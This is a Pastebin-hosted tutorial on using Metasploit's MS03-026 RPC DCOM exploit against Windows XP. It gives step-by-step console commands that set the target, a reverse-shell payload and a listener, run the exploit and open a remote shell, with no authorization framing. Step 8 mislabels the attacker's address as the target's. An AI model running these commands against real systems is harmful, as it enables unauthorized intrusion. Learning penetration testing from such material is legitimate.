Advertisement
johnmahugu

tutorial - How to Exploit and Gain Remote Access to PCs

Jul 8th, 2015
511
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.94 KB | None | 0 0
  1. tutorial - : How to Exploit and Gain Remote Access to PCs Running Windows XP
  2. In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now, we will begin to explore the Metasploit Framework and initiate a tried and true hack.
  3.  
  4. Before we start hacking, let's familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we'll try to make it understandable so that we can execute our first exploit.
  5. Terminology
  6.  
  7. The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.
  8.  
  9. * Exploit
  10.  
  11. Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you've probably already heard of are SQL injections, buffer overflows, etc.
  12.  
  13. * Payload
  14.  
  15. A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.
  16.  
  17. * Shellcode
  18.  
  19. This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It's called "shellcode" because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim's machine.
  20.  
  21. * Module
  22.  
  23. A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.
  24.  
  25. * Listener
  26.  
  27. This is that component that listens for the connection from the hacker's system to the target system. The listener simply handles the connection between these systems.
  28.  
  29. * Show
  30.  
  31. Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.
  32.  
  33. Now that we have the basics of Metasploit concepts and commands down, let's hack a system!
  34. Step 1: Getting Started
  35.  
  36. First, open a terminal in Linux.
  37.  
  38. One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It's a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft's comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.
  39.  
  40. Open the the Metasploit console.
  41.  
  42. msfconsole
  43.  
  44. Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.
  45. Step 2: Find the Exploit
  46.  
  47. Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:
  48.  
  49. msf > search dcom
  50. Step 3: Set the Exploit
  51.  
  52. Now let's tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.
  53.  
  54. msf > use exploit/windows/dcerpc/ms03_026_dcom
  55.  
  56. Note that the prompt has changed and now reflects our chosen exploit.
  57. Step 4: Set the Options
  58.  
  59. Now that we've chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.
  60.  
  61. msf > show options
  62. Step 5: Set Remote Host
  63.  
  64. Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we're attacking. In our case, it's 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.
  65.  
  66. msf > set RHOST 10.0.0.3
  67. Step 6: Show Payloads
  68.  
  69. Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
  70.  
  71. msf > show payloads
  72. Step 7: Set Payload
  73.  
  74. Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.
  75.  
  76. msf > set PAYLOAD generic/shell_reverse_tcp
  77. Step 8: Set Local Host
  78.  
  79. Now that we've chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.
  80.  
  81. msf > set LHOST 10.0.0.6
  82. Step 9: Exploit
  83.  
  84. Now we command Metasploit to exploit the system:
  85.  
  86. msf > exploit
  87. Step 10: Open a Shell on the Hacked System
  88.  
  89. Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console.
  90.  
  91. sessions –i 1
  92.  
  93. To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!
  94.  
  95. C: >dir
  96.  
  97. Congratulations! You have just hacked your first system using Metasploit!
  98.  
  99. In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit's proprietary payload.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement